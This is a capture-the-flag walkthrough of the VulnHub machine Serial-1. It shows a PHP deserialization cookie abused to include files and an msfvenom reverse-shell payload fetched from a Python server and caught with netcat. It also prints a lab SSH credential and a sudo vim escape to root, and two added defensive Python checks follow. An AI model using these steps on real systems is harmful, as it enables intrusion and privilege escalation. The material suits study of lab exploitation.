1# Introduction:
- Serial-1 is a boot2root machine from VulnHub and its size is 3.5GB and you can find it HERE.
- Operating System: Ubuntu 19.04.
- Author: sk4.
- Date-Release: 20 Aug 2019.
- I used VirtualBox to run this machine.
- Level: Beginner – Intermediate.
- Purpose: Get the root permissions & get the user and root flags.
2# Information Gathering:
After running the machine on VirtualBox the lock screen was
Then I opened Nmap to do a ping scan to find the IP of this machine, so I opened my terminal and typed this command:
nmap -sn 192.168.1.0/24
The results told me that the IP of the sk4 machine is 192.168.1.10 and my IP was 192.168.1.3.
Now we will do some active information gathering: we will do port scanning with the nmap tool to discover the open ports and the services running on these ports.
I typed nmap -sV -sC -p0-65535 192.168.1.10 and the result was

So, we have two ports open.
The first is 22/tcp; the service running on this port is SSH and its version is OpenSSH 7.9p1.
The second is 80/tcp; the service running on this port is HTTP and its version is Apache httpd 2.4.38.
The other ports are closed.
Now I'll open my browser and go to 192.168.1.10 to see the website, which was as follows:

Now we have enough information to start the next phase ‘Vulnerability Scanning’.
3# Scanning:
The second phase is Vulnerability Scanning, and we will scan the website to find bugs or anything that can lead us to hack this machine.
So, I'll try to find some directories by brute-forcing, and I'll use the gobuster tool and the dirb wordlist called common.txt by typing
gobuster dir -u 192.168.1.10 -w /usr/share/dirb/wordlists/common.txt -v | grep "Found"
and the result was as follows:

The /backup directory looks interesting, so I visited 192.168.1.10/backup and found a file called bak.zip, so I downloaded it

and I found 3 PHP files in this file

The content of the first file:

The content of the second file:

The content of the third file:

Now we have three interesting files, so we should analyse them to learn their purpose and try to get as much information as we can.
After analysing these files I knew that they are for testing a new cookie handler and that it can generate a new specific cookie with data of our choice.
I edited the first file and added
echo base64_encode(serialize(new User('root')));
Then I ran the file by typing php index.php and the result was as follows:

It generates a new cookie with a user called root, and if we intercept the request and replace the old cookie with the generated one we will see the change in the page.
But the important thing is in the log.class.php file: after analysing this file, it should show the log data but the variable is empty, so what about adding a file!
We will test this now by editing the log.class.php file as follows

and we should edit the user.class.php file as follows

Now we will type php index.php to generate the new cookie and replace the old one with it to see if anything changes.

I used Burp to intercept the request and replace the cookie and the result was

Bingo! It shows the content of the /etc/passwd file, so this system has a file inclusion bug and we can include files and open them on the system. So, what about making a reverse shell and including it!
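
Seen from the defender's side, the tampered cookie stands out: it is base64 over PHP serialize() output and it carries a class and a file path that the application never puts there itself. The Python check below is an added example, not part of the original write-up or the machine's code; the cookie name user, the allowed class list and the property names in the constructed samples are assumptions.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Classes the application legitimately stores in its cookie (assumption).
ALLOWED_CLASSES = {"User"}
# O:<len>:"<Class>":<count>:{ introduces an object in PHP serialize() output.
OBJECT_RE = re.compile(rb'O:\d+:"([A-Za-z_\\][\w\\]*)":\d+:\{')
# s:<len>:"<value>"; is a string; only path- or URL-like values are reported.
STRING_RE = re.compile(rb's:\d+:"([^"]*)";')
PATHLIKE_RE = re.compile(rb"^(/|\.\./|[a-z][a-z0-9+.-]*://)", re.I)


def inspect_cookie(value):
    """Return (unexpected_classes, pathlike_strings) for one cookie value."""
    try:
        raw = base64.b64decode(unquote(value), validate=True)
    except (binascii.Error, ValueError):
        return [], []                      # not base64: not this cookie format
    classes = {c.decode() for c in OBJECT_RE.findall(raw)}
    paths = [s.decode(errors="replace") for s in STRING_RE.findall(raw)
             if PATHLIKE_RE.match(s)]
    return sorted(classes - ALLOWED_CLASSES), paths


def scan_cookie_header(header):
    """Return [(cookie_name, unexpected_classes, pathlike_strings)]."""
    findings = []
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        unexpected, paths = inspect_cookie(value)
        if unexpected or paths:
            findings.append((name, unexpected, paths))
    return findings


def b64(data):
    return base64.b64encode(data).decode()


# Constructed samples; class and property names are hypothetical.
NORMAL = b64(b'O:4:"User":1:{s:4:"name";s:3:"sk4";}')
TAMPERED = b64(b'O:4:"User":2:{s:4:"name";s:4:"root";s:3:"log";'
               b'O:3:"Log":1:{s:4:"file";s:11:"/etc/passwd";}}')

if __name__ == "__main__":
    for label, cookie in (("normal", NORMAL), ("tampered", TAMPERED)):
        print(label, scan_cookie_header("theme=dark; user=" + cookie))
```

The durable fix is on the PHP side: keep cookie data away from unserialize(), or call it with the allowed_classes option so that no unexpected class is instantiated.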
4# Exploitation:
Now we will exploit the file inclusion bug to include a php reverse shell to establish a connection between us and the machine.
I opened Metasploit framework and searched for php to get all payloads and exploits related to PHP in Metasploit framework, so I opened msf5 and typed search 'php'

and I found a payload called

and I opened it in msf5 and showed its information

So this payload requires the local host & local port.
I used msfvenom to generate the payload by typing
msfvenom -p php/reverse_php LHOST=192.168.1.3 LPORT=1998 > pay.php

Now we wanna make a simple server with Python to make our payload reachable by the machine.
The command python -m SimpleHTTPServer 80 will make a simple server.

and the server seems to be working well.

Now we should edit the log.class.php file to change the path of the log file and replace it with the path of our payload.

Then I generated the new cookie by typing php index.php and the result was

Then I used the netcat tool to listen on port 1998, which I typed in the payload, and the command is
nc -lv -p 1998
and now we are listening on port 1998.

Then I opened Burp and intercepted the request to replace the old cookie with the generated one.

Now the connection is established and the result in the netcat terminal is

I searched for a useful file that would let me gain access through SSH and I found the credentials of the sk4 user, which were
[sk4:KywZmnPWW6tTbW5w]



So, I SSHed into the machine with these credentials by typing ssh sk4@192.168.1.10 and they were right and I found the first flag!

5# Privilege Escalation:
After gaining access to the machine we try to escalate our permissions to get root permissions, so I typed sudo -l to see what processes I can run with sudo and I found that we can run vim as root without any password required.

I opened Google and searched for exploits that can make me root through vim, and the result is to open vim by sudo vim then write :!/bin/bash

And bingo! We are root now! And the flag is

Now the machine is PWNED successfully and the shadow file is

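The sudo rule that made this last step possible is the kind of entry an audit of sudo -l output should catch. The Python check below is an added example, not part of the original write-up; every rule line in the sample listing is constructed (only the fact that vim runs as root without a password comes from the write-up), and the set of shell-capable programs is a short illustrative one.

```python
import os
import re

# Editors and pagers that can start a shell from inside the program.
# Short illustrative list chosen for this example, not exhaustive.
SHELL_CAPABLE = {"vim", "vi", "view", "less", "more", "man"}
# One rule line of `sudo -l` output: "(runas) TAG: TAG: cmd, cmd"
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")


def audit_sudo_listing(text):
    """Return [(command, reason)] for rules that amount to a root shell."""
    findings = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue                       # header or blank line
        runas, tags, cmds = m.groups()
        tags = set(tags.replace(":", " ").split())
        if runas.split(":")[0].strip() not in ("ALL", "root"):
            continue                       # rule does not run as root
        pw = "no password" if "NOPASSWD" in tags else "password required"
        for cmd in filter(None, (c.strip() for c in cmds.split(","))):
            prog = os.path.basename(cmd.split()[0])
            if cmd == "ALL":
                findings.append((cmd, f"any command as root ({pw})"))
            elif prog in SHELL_CAPABLE and "NOEXEC" not in tags:
                # NOEXEC stops the program from executing further commands.
                findings.append((cmd, f"{prog} can start a root shell ({pw})"))
    return findings


# Constructed `sudo -l` output; host name and rule lines are invented.
SAMPLE_LISTING = """\
User sk4 may run the following commands on sk4:
    (ALL) NOPASSWD: /usr/bin/vim
    (root) NOEXEC: /usr/bin/less /var/log/syslog
    (www-data) NOPASSWD: /usr/bin/man
    (root) /usr/bin/systemctl restart apache2
"""

if __name__ == "__main__":
    for command, reason in audit_sudo_listing(SAMPLE_LISTING):
        print(f"{command}: {reason}")
```

Where a user really needs to edit root-owned files, sudoedit or the NOEXEC tag avoids handing out an editor that runs as root.
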
Thank you for reading and I hope you learned something new.